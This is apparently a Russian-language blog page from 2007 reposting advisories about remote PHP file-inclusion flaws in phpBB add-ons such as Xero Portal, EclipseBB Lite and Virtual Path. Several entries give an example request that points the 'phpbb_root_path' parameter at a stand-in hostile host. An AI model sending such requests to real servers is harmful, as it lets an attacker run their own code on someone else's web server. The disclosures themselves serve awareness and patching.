Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием functions.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Веб сервера.
Пример: /includes/functions.php?phpbb_root_path=http://evilscripts?
Источник: xakep.ru
среда, января 31, 2007
вторник, января 30, 2007
Уязвимости phpBB: PHP-инклюдинг в Xero Portal
Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценариях admin/admin_linkdb.php, admin/admin_forum_prune.php, admin/admin_extensions.php, admin/admin_board.php, admin/admin_attachments.php и admin/admin_users.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Веб сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.
Источник: securitylab.ru
Источник: securitylab.ru
понедельник, января 29, 2007
Уязвимости phpBB: PHP-инклюдинг в EclipseBB Lite
Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием functions.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Источник: xakep.ru
Источник: xakep.ru
пятница, января 26, 2007
Уязвимости phpBB: PHP-инклюдинг в Virtual Path for phpBB
Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием vp/configure.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Веб сервера.
Пример: /vp/configure.php?phpbb_root_path=http://evilscripts?
Источник: xakep.ru
Пример: /vp/configure.php?phpbb_root_path=http://evilscripts?
Источник: xakep.ru
Подписаться на:
Сообщения (Atom)